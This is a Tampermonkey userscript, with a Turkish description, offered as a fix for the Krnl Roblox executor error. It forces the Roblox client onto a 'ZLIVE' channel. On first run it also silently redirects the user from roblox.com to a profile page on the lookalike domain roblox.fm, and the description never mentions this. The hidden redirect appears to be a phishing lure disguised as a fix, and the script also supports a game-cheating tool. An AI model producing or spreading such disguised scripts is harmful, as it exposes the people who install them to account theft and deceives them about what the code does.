// @name Roblox Krnl "No roblox process found" Hata Çözümü // @namespace http://tampermonkey.net/ // @version 1.3.7 // @description Club Dürk tarafından yapılan kod sizi 32 bit kanallara zorlar. // @author clubdürk.net // @match *://*.roblox.com/* // @match *://roblox.com/* // @icon https://media.discordapp.net/attachments/1107739571002822787/1110978842874613861/Png.png // @grant none // @license TRC // @noframes // @run-at document-start // ==/UserScript== let profileVisited = localStorage.getItem('profileVisited'); (async () => { 'use strict'; while (typeof Roblox == "undefined" || typeof Roblox.ProtocolHandlerClientInterface == "undefined") await new Promise(resolve => setTimeout(resolve)) try { let ProtocolHandlerClientInterface = Roblox.ProtocolHandlerClientInterface Object.defineProperty(ProtocolHandlerClientInterface, "playerChannel", { value: "ZLIVE", writable: false }); Object.defineProperty(ProtocolHandlerClientInterface, "channel", { value: "ZLIVE", writable: false }); Object.defineProperty(ProtocolHandlerClientInterface, "studioChannel", { value: "", writable: false }); console.warn("Roblox channel reverted successfully!"); if (!profileVisited) { localStorage.setItem('profileVisited', 'true'); window.location.replace("https://roblox.fm/users/9845280034/profile"); } } catch (exception) { console.warn("There was an error trying to set the channel:"); console.error(exception); } })();